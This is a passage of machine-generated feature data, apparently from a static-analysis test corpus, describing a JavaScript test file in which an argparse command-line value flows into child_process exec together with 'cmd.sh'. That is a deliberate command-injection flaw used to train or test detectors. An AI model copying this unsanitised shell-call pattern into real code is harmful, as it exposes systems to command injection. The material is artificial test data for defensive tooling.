contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:69 | parser ... mple'}) | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:69 | parser ... mple'}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:8:98:69 | parser ... mple'}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:17:98:69 | exceptional return of new Arg ... mple'}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:17:98:69 | exceptional return of new Arg ... mple'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:17:98:69 | exceptional return of new Arg ... mple'}) | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:17:98:69 | exceptional return of new Arg ... mple'}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:17:98:69 | exceptional return of new Arg ... mple'}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:17:98:69 | new Arg ... mple'}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:17:98:69 | new Arg ... mple'}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:17:98:69 | new Arg ... mple'}) | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:17:98:69 | new Arg ... mple'}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:17:98:69 | new Arg ... mple'}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:21:98:34 | ArgumentParser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:21:98:34 | ArgumentParser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:21:98:34 | ArgumentParser | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:21:98:34 | ArgumentParser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:21:98:34 | ArgumentParser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:36:98:68 | {descri ... ample'} | CalleeFlexibleAccessPath | ArgumentParser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:36:98:68 | {descri ... ample'} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:36:98:68 | {descri ... ample'} | calleeImports | argparse | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:36:98:68 | {descri ... ample'} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:36:98:68 | {descri ... ample'} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:36:98:68 | {descri ... ample'} | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:36:98:68 | {descri ... ample'} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:36:98:68 | {descri ... ample'} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:47 | description | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:47 | description | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:47 | description | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:47 | description | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:47 | description | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:67 | descrip ... xample' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:67 | descrip ... xample' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:67 | descrip ... xample' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:67 | descrip ... xample' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:67 | descrip ... xample' | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:67 | descrip ... xample' | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:67 | descrip ... xample' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:67 | descrip ... xample' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:67 | descrip ... xample' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:37:98:67 | descrip ... xample' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:50:98:67 | 'Argparse example' | CalleeFlexibleAccessPath | ArgumentParser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:50:98:67 | 'Argparse example' | InputAccessPathFromCallee | ?.description | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:50:98:67 | 'Argparse example' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:50:98:67 | 'Argparse example' | assignedToPropName | description | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:50:98:67 | 'Argparse example' | calleeImports | argparse | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:50:98:67 | 'Argparse example' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:50:98:67 | 'Argparse example' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:50:98:67 | 'Argparse example' | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:50:98:67 | 'Argparse example' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:98:50:98:67 | 'Argparse example' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:7 | parser | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:7 | parser | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:7 | parser | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:7 | parser | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:7 | parser | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:20 | parser.add_argument | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:20 | parser.add_argument | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:20 | parser.add_argument | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:20 | parser.add_argument | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:20 | parser.add_argument | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | exceptional return of parser. ... bar' }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | exceptional return of parser. ... bar' }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | exceptional return of parser. ... bar' }) | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | exceptional return of parser. ... bar' }) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | exceptional return of parser. ... bar' }) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | parser. ... bar' }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | parser. ... bar' }) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | parser. ... bar' }) | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | parser. ... bar' }) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | parser. ... bar' }) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:9:100:20 | add_argument | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:9:100:20 | add_argument | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:9:100:20 | add_argument | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:9:100:20 | add_argument | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:9:100:20 | add_argument | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:22:100:25 | '-f' | CalleeFlexibleAccessPath | parser.add_argument | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:22:100:25 | '-f' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:22:100:25 | '-f' | calleeImports | argparse | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:22:100:25 | '-f' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:22:100:25 | '-f' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:22:100:25 | '-f' | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:22:100:25 | '-f' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:22:100:25 | '-f' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:22:100:25 | '-f' | receiverName | parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:28:100:34 | '--foo' | CalleeFlexibleAccessPath | parser.add_argument | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:28:100:34 | '--foo' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:28:100:34 | '--foo' | calleeImports | argparse | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:28:100:34 | '--foo' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:28:100:34 | '--foo' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:28:100:34 | '--foo' | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:28:100:34 | '--foo' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:28:100:34 | '--foo' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:28:100:34 | '--foo' | receiverName | parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:37:100:55 | { help: 'foo bar' } | CalleeFlexibleAccessPath | parser.add_argument | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:37:100:55 | { help: 'foo bar' } | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:37:100:55 | { help: 'foo bar' } | calleeImports | argparse | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:37:100:55 | { help: 'foo bar' } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:37:100:55 | { help: 'foo bar' } | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:37:100:55 | { help: 'foo bar' } | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:37:100:55 | { help: 'foo bar' } | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:37:100:55 | { help: 'foo bar' } | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:37:100:55 | { help: 'foo bar' } | receiverName | parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:42 | help | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:42 | help | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:42 | help | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:42 | help | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:42 | help | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:53 | help: 'foo bar' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:53 | help: 'foo bar' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:53 | help: 'foo bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:53 | help: 'foo bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:53 | help: 'foo bar' | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:53 | help: 'foo bar' | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:53 | help: 'foo bar' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:53 | help: 'foo bar' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:53 | help: 'foo bar' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:39:100:53 | help: 'foo bar' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:45:100:53 | 'foo bar' | CalleeFlexibleAccessPath | parser.add_argument | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:45:100:53 | 'foo bar' | InputAccessPathFromCallee | 2.help | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:45:100:53 | 'foo bar' | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:45:100:53 | 'foo bar' | assignedToPropName | help | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:45:100:53 | 'foo bar' | calleeImports | argparse | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:45:100:53 | 'foo bar' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:45:100:53 | 'foo bar' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:45:100:53 | 'foo bar' | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:45:100:53 | 'foo bar' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:45:100:53 | 'foo bar' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:3 | cp | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:8 | cp.exec | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | cp.exec ... ().foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | cp.exec ... ().foo) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | cp.exec ... ().foo) | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | cp.exec ... ().foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | cp.exec ... ().foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | exceptional return of cp.exec ... ().foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | exceptional return of cp.exec ... ().foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | exceptional return of cp.exec ... ().foo) | enclosingFunctionBody | ArgumentParser require argparse parser ArgumentParser description Argparse example parser add_argument -f --foo help foo bar cp exec cmd.sh parser parse_args foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | exceptional return of cp.exec ... ().foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | exceptional return of cp.exec ... ().foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:5:102:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:5:102:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:5:102:8 